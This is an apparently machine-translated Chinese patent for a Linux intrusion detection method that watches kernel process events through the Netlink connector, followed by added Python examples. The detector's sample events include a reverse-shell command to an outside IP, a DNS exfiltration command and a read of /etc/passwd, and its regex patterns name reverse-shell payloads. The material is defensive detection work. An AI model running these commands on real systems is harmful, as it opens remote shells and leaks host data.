CN111651754B - Intrusion detection method and device, storage medium and electronic device

Info

Publication number: CN111651754B
Authority: CN (China)
Application number: CN202010287480.XA
Other languages: Chinese (zh)
Other versions: CN111651754A
Inventor: 翁迟迟
Assignee (current and original): Beijing QIYI Century Science and Technology Co Ltd
Legal status: Active
Prior art keywords: system kernel, target, event data, communication connection, target process

Classifications

    • G PHYSICS
    • G06 COMPUTING; CALCULATING OR COUNTING
    • G06F ELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00 Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50 Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55 Detecting local intrusion or implementing counter-measures
    • G06F21/554 Detecting local intrusion or implementing counter-measures involving event detection and direct action
    • G06F21/56 Computer malware detection or handling, e.g. anti-virus arrangements
    • G06F21/566 Dynamic detection, i.e. detection performed at run-time, e.g. emulation, suspicious activities

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Software Systems (AREA)
  • Theoretical Computer Science (AREA)
  • Computer Hardware Design (AREA)
  • General Engineering & Computer Science (AREA)
  • General Physics & Mathematics (AREA)
  • Physics & Mathematics (AREA)
  • Virology (AREA)
  • Health & Medical Sciences (AREA)
  • General Health & Medical Sciences (AREA)
  • Computer And Data Communications (AREA)
  • Debugging And Monitoring (AREA)

Abstract

The application discloses an intrusion detection method and device, a storage medium and an electronic device. The method comprises the following steps: determining a target process in a system kernel, the target process being a process whose status as an abnormal process generated by an intrusion into the system kernel is yet to be confirmed; acquiring event data of the target process through a communication connection, the communication connection being the connection used for communication with the system kernel and the event data being data generated by an event associated with the target process; and determining whether the target process is an abnormal process according to the data characteristics of the event data. The application solves the technical problem of low intrusion detection efficiency in the related art.

Description

Intrusion detection method and device, storage medium and electronic device
Technical Field
The present application relates to the field of internet, and in particular, to a method and apparatus for intrusion detection, a storage medium, and an electronic apparatus.
Background
With the rapid development of computer technology, information networks have become an important guarantee of social development. They carry a great deal of sensitive information, even national secrets, so they inevitably attract man-made attacks of every kind from around the world (e.g., information leakage, information theft, data manipulation, data deletion, computer viruses, etc.), among which intrusion attacks are one of the most common network attacks.
An intrusion detection system (Intrusion Detection System, abbreviated "IDS") is a network security device that handles network attacks: it monitors network transmissions in real time and, when suspicious transmissions are found, raises an alert or takes proactive action. The IDS is an important link in the security protection system and also the last link in the defense-in-depth system. When an attacker attacks the internal network and obtains the authority of a server, serious damage is often caused to the host owner through account operations, privilege escalation, network configuration and file operations, including service interruption or complete destruction, data leakage or loss, continuous execution of operations irrelevant to the service (such as sending DDoS attack packets, mining and the like), and sometimes a back door is left on the server. A HIDS for the Linux system has always been the most basic and the most difficult problem to solve in the security field, the main reasons being the large number of versions, poor stability, serious performance loss and the like.
The existing intrusion detection schemes are mainly customized developments based on a mainstream open source project (for example OSSEC). Such development schemes have a complex structure, large resource consumption, serious performance loss and low efficiency, and have difficulty detecting advanced threats in user mode.
In view of the above problems, no effective solution has been proposed at present.
Disclosure of Invention
The embodiment of the application provides an intrusion detection method and device, a storage medium and an electronic device, which are used for at least solving the technical problem of low intrusion detection efficiency in the related technology.
According to an aspect of an embodiment of the present application, there is provided a method for detecting intrusion, including: determining a target process in a system kernel, wherein the target process is an abnormal process generated by invading the system kernel to be confirmed; acquiring event data of a target process through communication connection, wherein the communication connection is the connection for communication with a system kernel, and the event data is data generated by an associated event of the target process; and determining whether the target process is an abnormal process according to the data characteristics of the event data.
According to another aspect of the embodiment of the present application, there is also provided an intrusion detection apparatus, including: the determining unit is used for determining a target process in the system kernel, wherein the target process is an abnormal process generated by invading the system kernel to be confirmed or not; the system comprises an acquisition unit, a communication connection unit and a control unit, wherein the acquisition unit is used for acquiring event data of a target process through the communication connection, the communication connection is a connection for communication with a system kernel, and the event data is data generated by an associated event of the target process; and the detection unit is used for determining whether the target process is an abnormal process according to the data characteristics of the event data.
According to another aspect of the embodiments of the present application, there is also provided a storage medium including a stored program that executes the above-described method when running.
According to another aspect of the embodiments of the present application, there is also provided an electronic device including a memory, a processor, and a computer program stored on the memory and executable on the processor, the processor executing the method described above by the computer program.
In the embodiment of the application, it is determined whether a to-be-confirmed process in the system kernel is a target process, i.e. an abnormal process generated by an intrusion into the system kernel; the event data of the target process is acquired through the communication connection, and whether the target process is an abnormal process is then determined according to the data characteristics of the event data. In other words, by adopting the technical scheme of the application, whether an abnormal process exists can be monitored directly through the communication connection between the user state and the kernel state, without customized development of an open source project, so the time and resource consumption brought by such a development scheme are avoided, the technical problem of low intrusion detection efficiency in the related art is solved, and the technical effect of improving detection efficiency is achieved.
Drawings
The accompanying drawings, which are included to provide a further understanding of the application and are incorporated in and constitute a part of this specification, illustrate embodiments of the application and together with the description serve to explain the application and do not constitute a limitation on the application. In the drawings:
FIG. 1 is a flow chart of an alternative intrusion detection method according to an embodiment of the application;
FIG. 2 is a flow chart of an alternative intrusion detection method according to an embodiment of the application;
FIG. 3 is a flow chart of an alternative intrusion detection method according to an embodiment of the application;
FIG. 4 is a schematic diagram of an alternative intrusion detection device according to an embodiment of the application;
and FIG. 5 is a block diagram of the structure of a terminal according to an embodiment of the present application.
Detailed Description
In order that those skilled in the art will better understand the present application, a technical solution in the embodiments of the present application will be clearly and completely described below with reference to the accompanying drawings in which it is apparent that the described embodiments are only some embodiments of the present application, not all embodiments. All other embodiments, which can be made by those skilled in the art based on the embodiments of the present application without making any inventive effort, shall fall within the scope of the present application.
It should be noted that the terms "first," "second," and the like in the description and the claims of the present application and the above figures are used for distinguishing between similar objects and not necessarily for describing a particular sequential or chronological order. It is to be understood that the data so used may be interchanged where appropriate such that the embodiments of the application described herein may be implemented in sequences other than those illustrated or otherwise described herein. Furthermore, the terms "comprises," "comprising," and "having," and any variations thereof, are intended to cover a non-exclusive inclusion, such that a process, method, system, article, or apparatus that comprises a list of steps or elements is not necessarily limited to those steps or elements expressly listed but may include other steps or elements not expressly listed or inherent to such process, method, article, or apparatus.
FIG. 1 is a flow chart of an alternative intrusion detection method according to an embodiment of the application, as shown in FIG. 1, the method may include the steps of:
Step S102, in the user state, determining a target process of the system kernel (i.e. the kernel state), where the target process is a process whose status as an abnormal process generated by an intrusion into the system kernel is yet to be confirmed.
In the memory protection of the processor there are two main privilege states. One is the kernel state, also called the privileged state, kernel mode or supervisor state; it is the mode in which the kernel of the operating system runs, and code running in this mode can access system memory and external devices without limitation. The other is the user state, which is the non-privileged state: code executed in this state is restricted by the hardware and cannot perform certain operations, such as writing into the memory space of other processes, so as to prevent potential safety hazards to the operating system, and the kernel prohibits code in this state from performing potentially dangerous operations such as writing to system configuration files, killing other users' processes, restarting the system, etc.
The core of the computer is the CPU, which bears all processing tasks; the operating system is the manager of the computer, responsible for task scheduling, resource allocation and management, and for the computer hardware as a whole; an application is a program with a certain function that runs on top of the operating system. A process is one dynamic execution of a program with a certain independent function on a data set; it is the independent unit by which the operating system allocates and schedules resources, and the carrier in which the application program runs.
A user-state process is limited by user-state authority and generally does not cause potential safety hazards, whereas the authority of a process running in the kernel state is not limited, so if such a process is operated improperly the whole computer can be greatly damaged. The target process in this application refers to a process in the kernel state.
Step S104, in the user state, obtaining event data of the target process through a communication connection, where the communication connection is the connection used for communication with the system kernel, and the event data is data generated by an event associated with the target process.
The communication connection (also referred to as a connector) is a communication connection between a user state and a kernel state, through which the user state can monitor process-related information in the kernel state, such as process events, event data, etc.
Step S106, in the user state, determining whether the target process is an abnormal process according to the data characteristics of the event data.
Through the above steps, it is determined whether a to-be-confirmed process in the system kernel is a target process, i.e. an abnormal process generated by an intrusion into the system kernel; the event data of the target process is acquired through the communication connection, and whether the target process is an abnormal process is then determined according to the data characteristics of the event data. In other words, by adopting the technical scheme of the application, whether an abnormal process exists can be monitored directly through the communication connection between the user state and the kernel state, without customized development of an open source project, so the time and resource consumption brought by such a development scheme are avoided, the technical problem of low intrusion detection efficiency in the related art is solved, and the technical effect of improving detection efficiency is achieved.
In addition, through analysis of the related art the inventor recognized that the core data of anti-intrusion detection in host security comprises three types: commands, networks and files. Files generate processes and processes generate networks, so most security events can be captured from the process point of view; process events are the most important security perception data in anti-intrusion detection and the basis of security detection and anomaly analysis. By adopting the technical scheme of the application based on process events, it can be determined from basic analysis of process event data whether weak-password scanning or brute-force cracking took place before an attack, whether a reverse shell is present (a control end listens on a certain TCP/UDP port, the controlled end initiates a request to that port and forwards the input and output of its command line to the control end), whether command execution injection occurred (where only data input is expected, malicious code is input together with the data, and because the system that loads the data has no well-designed filtering process the malicious code is executed along with it, finally causing information leakage or damage to normal data), or whether a back door or hidden process exists; at the same time, security events can be analyzed in a multi-dimensional way according to different attack vectors. The technical scheme of the present application is further detailed below in connection with the steps shown in FIG. 1.
In the technical scheme provided in step S102, a target process in the system kernel is determined, where the target process is a process whose status as an abnormal process generated by an intrusion into the system kernel is yet to be confirmed.
Optionally, before the target process in the system kernel is determined, the communication connection between the monitoring application (such as a lightweight user-mode ncp application program in the Linux system) and the system kernel may be established in the following manner, so that the target process in the system kernel is determined through the monitoring application (a user-mode application).
Step 1, the monitoring application sends first indication information to the system kernel. The first indication information instructs the system kernel to establish a connector instance and carries the instance identification ID of that instance; the connector instance is an application instance in the kernel state and is used to realize the communication connection between the monitoring application and the system kernel. Taking the Netlink Connector in the Linux system as an example, cn_add_callback (i.e. the first indication information) can be sent to the kernel: the interface function cn_add_callback registers a new connector instance and a corresponding callback function with the connector, the connector instance being designated by the id parameter and the callback by the callback parameter. (A callback function is a function called through a function pointer: when the address of a function is passed as a parameter to another function and that pointer is then used to call the function it points to, this is a callback. The callback is not called directly by the party that implements it, but by another party when a specific event or condition occurs, in order to respond to that event or condition.)
Step 2, in order to communicate with the connector instance Netlink Connector, when a first response message indicating that the connection has been established successfully is received from the system kernel, second indication information is sent to the system kernel. The second indication information instructs the system kernel to add the instance identifier to a target identifier set, the identifiers in the target identifier set indicating the applications in kernel mode that are allowed to communicate with applications in user mode. For example, in some kernels a user-mode application is by default not allowed to send to a Netlink group whose group number is other than 1 (i.e. the group in which the target identifier set is located), so in order to use a group other than 1 the user-mode application first needs to add the established connector to that group.
Step 3, when a second response message indicating that the join succeeded is received from the system kernel, the communication connection between the monitoring application and the system kernel is established by means of the connector instance; for example, a message is sent to the connector instance in the specified group by means of the interface function cn_netlink_send.
In the above embodiment, the target process in the system kernel may be determined using the connector instance as follows:
Step 1, receiving a process creation message monitored by a connector instance in a system kernel, wherein the process creation message carries a process identifier of a process created in the system kernel.
Step 2, taking the process represented by the process identifier as the target process.
In the technical scheme provided in step S104, event data of the target process is obtained through a communication connection, where the communication connection is a connection for performing communication with a system kernel, and the event data is data generated by an associated event of the target process.
Optionally, a monitoring application used in user mode (such as the ncp application) may be created in advance, so that when the event data of the target process is acquired through the communication connection, it is acquired by calling the communication connection in the monitoring application.
In the technical scheme provided in step S106, whether the target process is an abnormal process is determined according to the data characteristics of the event data.
Alternatively, determining whether the target process is an abnormal process according to the data characteristics of the event data may be implemented as follows:
Step 1, in order to avoid identifying the behavior of some system security applications as intrusion behavior, a white list (i.e. a target identifier set) may be established in advance, and the process identifier carried in a process creation message monitored by the system kernel is compared with the identifiers in the target identifier set, where the identifiers in the target identifier set are the process identifiers of processes created in the system kernel by those applications.
Step 2, when no identifier matching the process identifier carried in the process creation message exists in the target identifier set, whether the target process is an abnormal process is determined according to the data characteristics of the event data after execution.
Step 3, when the event data is detected to carry a first type of command (namely a high-risk command), the target process is determined to belong to a first type of abnormal process (namely a process generated by executing a high-risk command), where the first type of command is carried in data sent by a second terminal to a first terminal, the first terminal is the terminal where the system kernel is located, and the first type of abnormal process is created by executing the first type of command. The first type of command can be divided into three kinds: no-echo commands, echo commands and secondary penetration commands.
Step 4, when the event data is detected to carry a second type of command (namely a reverse shell), the target process is determined to belong to a second type of abnormal process (namely an abnormal process caused by a reverse shell), where the second type of command is a command entered in a target window of the second terminal, the target window is a control window for the first terminal, and the second type of abnormal process is created by executing the second type of command.
Optionally, after determining whether the target process is an abnormal process according to the data characteristics of the event data, prompt information on whether the target process is an abnormal process is displayed in the monitoring application, so as to prompt the user to adopt corresponding security measures.
As an optional embodiment, the technical solution of the present application is further described in detail by taking the application of the technical solution of the present application to a Linux system as an example.
In a Linux system, reverse shells and command injection are common means of intruding into a web server, and discovering them effectively and in time is a difficult point; since the Agent end has no relevant discovery mechanism, hacker intrusion behavior cannot be discovered at the first moment. In order to discover common hacker intrusion behavior in time, the application provides a reverse shell and command injection detection method based on a behavior call chain.
The first method is a kernel module hook (a hook function captures the information before the system calls the function; at that point the hook function can process the execution behavior of the function and can force the transfer of the information) that intercepts the system calls fork and exec. Through the system call fork, a process creates a new process that is almost identical to itself, i.e. the two processes can do the same thing, though if the initial parameters or input variables differ the two processes can do different things; after a process calls fork, the system allocates resources for the new process, for example space for storing data and code, then copies all the values of the original process into the new process, only a few values differing from those of the original process, which is equivalent to cloning itself. The fork function thus creates a child process that is almost a copy of its parent; sometimes the user instead wants the child to run a different program, which is achieved by exec, which replaces the program of the calling process with the specified program. The second method intercepts same-named functions by means of a preload mechanism (namely, using the preload capability supported by the system to inject a module into a process automatically to realize the hook); it has the advantages of being lightweight and simple to implement, but it cannot cover some security scenarios.
The application also provides a third scheme for acquiring process event data, as shown in FIG. 2:
Step S201, a Netlink connector connection is established using cn_add_callback.
Process event auditing is implemented through the Linux connector and the interfaces provided by the Linux kernel (the interface function cn_add_callback registers a new connector instance and a corresponding callback function with the connector, the interface function cn_del_callback unregisters the callback function, and the interface function cn_netlink_send sends a message to a given group).
Step S202, the process connector switch is turned on.
Step S203, process events, such as those produced by proc_fork_connector, proc_exec_connector and proc_exit_connector, are received; the kernel sends them with cn_netlink_send.
Step S204, the event is parsed; combined with the user-state lightweight ncp application program, parsing is safe and reliable, the effect on the host is small, and more security scenarios can be covered.
Step S205, the process data is complemented, for example with related information about the parent process.
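The connector setup of steps 1 to 3 above and the acquisition flow of steps S201 to S205 seen from user space, as an added example that is not code from the patent or from the ncp program it mentions. It builds the user-to-kernel subscribe message (the "process connector switch" of S202), decodes the kernel's fork/exec/exit events, and complements each event from /proc as in S205; the wire layouts follow the kernel's netlink, connector and cn_proc headers, and the constants NETLINK_CONNECTOR, CN_IDX_PROC, CN_VAL_PROC and PROC_CN_MCAST_LISTEN are the kernel's values. build_event_datagram, which fabricates a kernel-side datagram so the parser can be exercised offline, is an assumption of this example; running listen() needs Linux and CAP_NET_ADMIN.

```python
"""Subscribing to the Linux process connector (cn_proc) from user space.

Added example, not code from the patent or from the ncp program it mentions.
Wire formats follow <linux/netlink.h>, <linux/connector.h> and <linux/cn_proc.h>;
running listen() needs Linux and CAP_NET_ADMIN (or root).
"""
import os
import socket
import struct

NETLINK_CONNECTOR = 11          # netlink protocol number of the connector
CN_IDX_PROC = 1                 # connector index (= multicast group) of cn_proc
CN_VAL_PROC = 1
NLMSG_DONE = 3                  # cn_proc messages are carried as NLMSG_DONE
PROC_CN_MCAST_LISTEN = 1        # the "process connector switch" of step S202
PROC_CN_MCAST_IGNORE = 2
PROC_EVENT_FORK = 0x00000001
PROC_EVENT_EXEC = 0x00000002
PROC_EVENT_EXIT = 0x80000000

# "=" stops struct from inserting padding, so offsets match the kernel layout:
NLMSGHDR = struct.Struct("=IHHII")      # nlmsg_len, type, flags, seq, pid
CN_MSG = struct.Struct("=IIIIHH")       # cb_id.idx, cb_id.val, seq, ack, len, flags
PROC_EVENT_HDR = struct.Struct("=IIQ")  # what, cpu, timestamp_ns (8-byte aligned)
EVENT_NAMES = {PROC_EVENT_FORK: "fork", PROC_EVENT_EXEC: "exec", PROC_EVENT_EXIT: "exit"}


def build_listen_message(pid, seq=0, op=PROC_CN_MCAST_LISTEN):
    """User -> kernel: nlmsghdr + cn_msg + enum proc_cn_mcast_op."""
    payload = struct.pack("=I", op)
    cn = CN_MSG.pack(CN_IDX_PROC, CN_VAL_PROC, seq, 0, len(payload), 0)
    nl = NLMSGHDR.pack(NLMSGHDR.size + CN_MSG.size + len(payload), NLMSG_DONE, 0, seq, pid)
    return nl + cn + payload


def build_event_datagram(what, *fields, cpu=0, timestamp_ns=0):
    """Kernel -> user, laid out as cn_proc emits it (constructed here for testing)."""
    payload = PROC_EVENT_HDR.pack(what, cpu, timestamp_ns) + struct.pack("=%dI" % len(fields), *fields)
    cn = CN_MSG.pack(CN_IDX_PROC, CN_VAL_PROC, 0, 0, len(payload), 0)
    nl = NLMSGHDR.pack(NLMSGHDR.size + CN_MSG.size + len(payload), NLMSG_DONE, 0, 0, 0)
    return nl + cn + payload


def parse_proc_event(datagram):
    """Decode one datagram into a dict, or None if it is not a cn_proc event."""
    if len(datagram) < NLMSGHDR.size + CN_MSG.size + PROC_EVENT_HDR.size:
        return None
    _, nl_type, _, _, _ = NLMSGHDR.unpack_from(datagram, 0)
    if nl_type != NLMSG_DONE:
        return None
    idx, val, _, _, _, _ = CN_MSG.unpack_from(datagram, NLMSGHDR.size)
    if (idx, val) != (CN_IDX_PROC, CN_VAL_PROC):
        return None
    off = NLMSGHDR.size + CN_MSG.size
    what, _, ts = PROC_EVENT_HDR.unpack_from(datagram, off)
    data = off + PROC_EVENT_HDR.size
    ev = {"what": EVENT_NAMES.get(what, hex(what)), "timestamp_ns": ts}
    if what == PROC_EVENT_FORK:      # parent_pid, parent_tgid, child_pid, child_tgid
        ev["ppid"], ev["ptgid"], ev["pid"], ev["tgid"] = struct.unpack_from("=IIII", datagram, data)
    elif what == PROC_EVENT_EXEC:    # process_pid, process_tgid
        ev["pid"], ev["tgid"] = struct.unpack_from("=II", datagram, data)
    elif what == PROC_EVENT_EXIT:    # process_pid, process_tgid, exit_code, exit_signal
        ev["pid"], ev["tgid"], ev["exit_code"], ev["exit_signal"] = struct.unpack_from("=IIII", datagram, data)
    return ev


def enrich_from_proc(pid):
    """Step S205: complement the event from /proc (ppid, comm, cmdline, cwd, stdio).
    Returns None when the process is already gone, which the async queue must tolerate."""
    base = "/proc/%d" % pid
    try:
        with open(base + "/stat") as f:
            stat = f.read()
        with open(base + "/cmdline", "rb") as f:
            argv = [a.decode(errors="replace") for a in f.read().split(b"\0") if a]
        cwd = os.readlink(base + "/cwd")
    except OSError:
        return None
    comm = stat[stat.index("(") + 1:stat.rindex(")")]   # comm may itself contain spaces
    ppid = int(stat[stat.rindex(")") + 2:].split()[1])   # field after the state letter
    stdio = []
    for fd in range(3):                                  # "socket:[...]" here means redirected I/O
        try:
            stdio.append(os.readlink("%s/fd/%d" % (base, fd)))
        except OSError:
            stdio.append(None)
    return {"pid": pid, "ppid": ppid, "comm": comm, "cmdline": argv, "cwd": cwd, "stdio": stdio}


def listen(handler):
    """Open the connector socket, join group CN_IDX_PROC, send LISTEN, dispatch events."""
    sock = socket.socket(socket.AF_NETLINK, socket.SOCK_DGRAM, NETLINK_CONNECTOR)
    sock.bind((os.getpid(), CN_IDX_PROC))                # (port id, multicast groups)
    sock.send(build_listen_message(os.getpid()))
    try:
        while True:
            ev = parse_proc_event(sock.recv(4096))
            if ev:
                handler(ev)
    finally:
        sock.send(build_listen_message(os.getpid(), op=PROC_CN_MCAST_IGNORE))
        sock.close()


if __name__ == "__main__":
    listen(lambda ev: print(ev, enrich_from_proc(ev.get("pid", 0))))
```

The kernel answers the LISTEN request with a PROC_EVENT_NONE acknowledgement before the first real event, which parse_proc_event passes through with no pid; enrich_from_proc is deliberately tolerant of a process that has exited between the exec event and the /proc lookup, since the description queues the pid and completes the metadata asynchronously.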
The flow for realizing intrusion detection by adopting the technical scheme of the application is shown in FIG. 3:
Step S301, attack samples are acquired.
Step S302, a decision tree is generated using the existing attack samples: on the basis of the known probabilities of occurrence of the various situations, a decision tree is constructed, for example the decision tree corresponding to the content of step S306 below.
Step S303, the agent in the user state (e.g. the ncp program above) establishes a netlink connection between the kernel state and the user state.
Step S304, the process creation message is obtained in real time by the netlink monitoring system calling cn_proc in kernel mode; the process creation message carrying the pid is received in real time through netlink and stored in a local message queue.
Step S305, meta information is acquired asynchronously, that is, the process call chain (such as the parent process, process name, process command line, process directory and input/output redirection, i.e. process io redirection) is obtained using the associated process information.
Step S306, process call chain information, such as parent process information, is obtained.
Step S307, the critical features of dangerous processes are extracted by analyzing the commands hackers commonly execute, forming a decision tree, and whether a command is a reverse shell is determined by real-time association with the decision tree.
First, white list filtering is performed: whether the application corresponding to the process is a white-listed application (such as zabbix) is judged through the cwd associated with the process identifier pid. If so, the following steps are not executed; otherwise, they are continued.
Second, whether the executed command is a high-risk command is judged, the following three attack types being common:
The first is echo commands: the batch command being executed and its result can be displayed on the attacker's host, such as the command "set id/etc/passwd" that a scanner scans automatically.
These are detected by judging whether a command with scanner echo characteristics is executed.
The second is no-echo commands: the batch command being executed, its result and so on are not displayed on the attacker's host, and the command has no echo information, such as the dns command executing "nslookup 'hostname' ceye.
Detection of the dns command can be performed by determining cmdline payload features, such as "nslookup 'hostname' dns".
The third is manual penetration attacks by hackers, such as the commands "whoami, pwd, ls.
To detect manual hacker commands, a set of commands commonly used by hackers can be stored in advance; when judging whether a certain command is a manual hacker command, the command is compared with the commands in the set to complete the judgment.
For the three types of command the judgments can be carried out sequentially; to improve accuracy, the commands that are recognized with high accuracy in practice can be placed first, and those that are easily mistaken placed later.
Third, whether the process is a reverse shell is judged. Reverse shell detection has the following two common modes:
One is sub-shell redirection detection (i.e. judging whether the input and output are redirected); the false alarm probability of this scheme is very low.
The other is command line payload detection (i.e. detection of the manner in which the command line is injected).
Judging whether the sub-shell is redirected has an extremely low false alarm probability but may miss alarms, whereas judging whether the payload is a reverse shell from a common cheat sheet has a low miss rate but some false alarms. Therefore, combining the two reduces both the miss rate and the false alarm rate, thereby improving detection accuracy.
In this embodiment, it is first determined whether the command line has a payload feature; if it does, the parent process is determined and the network connection is acquired. In the parent process judgment it is judged whether the parent process is a Web container, then whether the network connection has an IP, and the anomaly type is then determined according to the combination of parent process and network connection conditions. For example, if the parent process is a Web container and the network connection is to an intranet IP, this indicates a reverse shell to an intranet IP; if the parent process is a Web container and the network connection is to an external network IP, this indicates a reverse shell to an external network IP.
Step S308, if a reverse shell or command injection is found, an alarm is delivered.
Step S309, after receiving the alarm the operator checks whether it is correct and, if not, corrects it.
By adopting the technical scheme of the application, the process creation message can be obtained in real time by calling cn_proc through a netlink monitoring system; acquiring a process call chain, a father process, a process name, a process command line, a process directory and input/output redirection by utilizing associated process information; and extracting critical characteristics of the dangerous process by analyzing a common hacker execution command to form a decision tree.
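The decision tree described above, as an added Python example written for this page (it is not the patent's implementation): it applies the steps in order to constructed process events, namely skipping processes the monitor itself created, whitelist filtering by cwd, the three high-risk command types, and the two reverse shell checks combined with the parent-process and IP context. The whitelist prefixes, Web container names, cmdline patterns and the order of the command checks are assumptions.

```python
import ipaddress
import re
from dataclasses import dataclass
from typing import FrozenSet, Optional


@dataclass
class ProcEvent:
    """Event data gathered for one process-creation message (all fields constructed)."""
    pid: int
    ppid: int
    parent_name: str                 # comm of the parent process
    cwd: str                         # working directory associated with the pid
    cmdline: str                     # command line of the process
    stdin_target: str = ""           # what fd 0 points to, e.g. "socket:[1234]" or "/dev/pts/0"
    stdout_target: str = ""          # what fd 1 points to
    remote_ip: Optional[str] = None  # peer IP of the process's network connection, if any


# Assumed whitelist: applications recognised by the cwd of their processes (e.g. zabbix).
WHITELIST_CWD_PREFIXES = ("/var/lib/zabbix", "/usr/lib/zabbix")
# Assumed parent process names treated as Web containers.
WEB_CONTAINERS = {"java", "tomcat", "php-fpm", "httpd", "nginx"}
# Assumed cmdline features for the three high-risk command types; the most precise
# checks run first as the patent recommends, but the concrete order is our choice.
DNS_NO_ECHO = re.compile(r"\b(nslookup|dig)\b.*(`hostname`|\$\(hostname\)|`whoami`)")
SCANNER_ECHO = re.compile(r"/etc/passwd|\bid\b\s*;\s*cat\b")
MANUAL_COMMANDS = frozenset({"whoami", "pwd", "ls", "id", "uname"})
# Assumed payload features from a reverse-shell cheatsheet (mode 2 of the reverse shell check).
REVERSE_SHELL_PAYLOAD = re.compile(r"/dev/tcp/|\bnc\b.*\s-e\s|\bbash\s+-i\b|socket\.socket\(")
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_whitelisted(ev: ProcEvent) -> bool:
    """Whitelist filtering through the cwd associated with the pid."""
    return ev.cwd.startswith(WHITELIST_CWD_PREFIXES)


def classify_high_risk_command(cmdline: str) -> Optional[str]:
    """Return the matched attack type, or None if no high-risk command feature is present."""
    if DNS_NO_ECHO.search(cmdline):
        return "dns_no_echo"          # command without echo (out-of-band DNS)
    if SCANNER_ECHO.search(cmdline):
        return "scanner_echo"         # scanner command whose output is echoed back
    tokens = cmdline.split()
    if tokens and tokens[0] in MANUAL_COMMANDS:
        return "manual"               # matches the stored set of hacker manual commands
    return None


def classify_reverse_shell(ev: ProcEvent) -> Optional[str]:
    """Mode 1 (fd redirection, few false positives) plus mode 2 (payload, few misses)."""
    if ev.stdin_target.startswith("socket:") and ev.stdout_target.startswith("socket:"):
        return "subshell_redirect"
    if not REVERSE_SHELL_PAYLOAD.search(ev.cmdline):
        return None
    # Payload seen: confirm with the parent process and the network connection.
    if ev.parent_name not in WEB_CONTAINERS:
        return "payload_only"         # lower confidence: parent is not a Web container
    if ev.remote_ip is None:
        return "webcontainer_no_ip"
    addr = ipaddress.ip_address(ev.remote_ip)
    scope = "intranet" if any(addr in net for net in RFC1918) else "extranet"
    return f"webcontainer_{scope}"


def detect(ev: ProcEvent, own_pids: FrozenSet[int] = frozenset()) -> Optional[str]:
    """Run the decision tree on one event; return the alarm type or None."""
    if ev.pid in own_pids:            # process created by the monitoring application itself
        return None
    if is_whitelisted(ev):
        return None
    cmd_type = classify_high_risk_command(ev.cmdline)
    if cmd_type:
        return f"command_injection:{cmd_type}"
    shell_type = classify_reverse_shell(ev)
    if shell_type:
        return f"reverse_shell:{shell_type}"
    return None


if __name__ == "__main__":
    # Constructed sample events, not real telemetry.
    samples = [
        ProcEvent(101, 50, "zabbix_agentd", "/var/lib/zabbix", "cat /etc/passwd"),
        ProcEvent(102, 60, "php-fpm", "/var/www", "nslookup `hostname` ceye.example"),
        ProcEvent(103, 70, "java", "/opt/app", "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1",
                  remote_ip="203.0.113.5"),
        ProcEvent(104, 70, "java", "/opt/app", "sh", "socket:[8811]", "socket:[8811]"),
        ProcEvent(105, 80, "sshd", "/home/ops", "python3 app.py"),
    ]
    for ev in samples:
        print(ev.pid, ev.cmdline, "->", detect(ev))
```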
It should be noted that, for simplicity of description, the foregoing method embodiments are all described as a series of acts, but it should be understood by those skilled in the art that the present application is not limited by the order of acts described, as some steps may be performed in other orders or concurrently in accordance with the present application. Further, those skilled in the art will also appreciate that the embodiments described in the specification are all preferred embodiments, and that the acts and modules referred to are not necessarily required for the present application.
From the description of the above embodiments, it will be clear to a person skilled in the art that the method according to the above embodiments may be implemented by means of software plus the necessary general hardware platform, but of course also by means of hardware, but in many cases the former is a preferred embodiment. Based on such understanding, the technical solution of the present application may be embodied essentially or in a part contributing to the prior art in the form of a software product stored in a storage medium (e.g. ROM/RAM, magnetic disk, optical disk) comprising instructions for causing a terminal device (which may be a mobile phone, a computer, a server, or a network device, etc.) to perform the method according to the embodiments of the present application.
According to another aspect of the embodiment of the present application, there is also provided an intrusion detection apparatus for implementing the intrusion detection method described above. FIG. 4 is a schematic diagram of an alternative intrusion detection device according to an embodiment of the application, as shown in FIG. 4, which may include:
The determining unit 401 is configured to determine a target process in the system kernel, where the target process is an abnormal process generated by invading the system kernel to be confirmed.
And an obtaining unit 403, configured to obtain event data of the target process through a communication connection, where the communication connection is a connection for performing communication with a system kernel, and the event data is data generated by an associated event of the target process.
And the detection unit 405 is configured to determine whether the target process is an abnormal process according to the data characteristics of the event data.
It should be noted that the determining unit 401 in this embodiment may be used to perform step S102 in the embodiment of the present application, the acquiring unit 403 in this embodiment may be used to perform step S104 in the embodiment of the present application, and the detecting unit 405 in this embodiment may be used to perform step S106 in the embodiment of the present application.
It should be noted that the above modules correspond to the examples and application scenarios implemented by the corresponding steps, but are not limited to what is disclosed in the above embodiments. It should be noted that the above modules may be implemented in software or hardware as part of the apparatus and may be operated in a corresponding hardware environment.
By means of the above modules, it is determined whether a to-be-confirmed process in the system kernel is a target process, i.e. an abnormal process generated by intrusion into the system kernel; the event data of the target process is acquired through the communication connection, and whether the target process is an abnormal process is further determined according to the data characteristics of the event data. In other words, with the technical scheme of the application, whether an abnormal process exists can be monitored directly through the communication connection between user state and kernel state, without customized development of an open source project, so the time and resource consumption of such development are avoided, the technical problem of low intrusion detection efficiency in the related art can be solved, and the technical effect of improving detection efficiency is achieved.
Optionally, the apparatus of the present application may further comprise: the communication establishing unit is used for establishing communication connection between the monitoring application and the system kernel before the event data of the target process is acquired through communication connection, wherein the monitoring application is a user-state application; the acquisition unit may be further configured to: in a monitoring application, event data of a target process is acquired by invoking a communication connection.
Optionally, the above communication establishing unit may further be configured to: the method comprises the steps of sending first indication information to a system kernel, wherein the first indication information is used for indicating the system kernel to establish a connector instance, the first indication information carries an instance identifier of the connector instance, the connector instance is used for realizing communication connection between a monitoring application and the system kernel, and the connector instance is an application instance in a kernel state; under the condition that a first response message of the system kernel representing that the establishment is successful is received, second indication information is sent to the system kernel, wherein the second indication information is used for indicating the system kernel to add an instance identifier into a target identifier set, and the identifier in the target identifier set is used for representing an application in a kernel mode which allows communication with the application in a user mode; in the event that a second response message is received by the system kernel indicating that the joining was successful, a communication connection between the monitoring application and the system kernel is established using the connector instance.
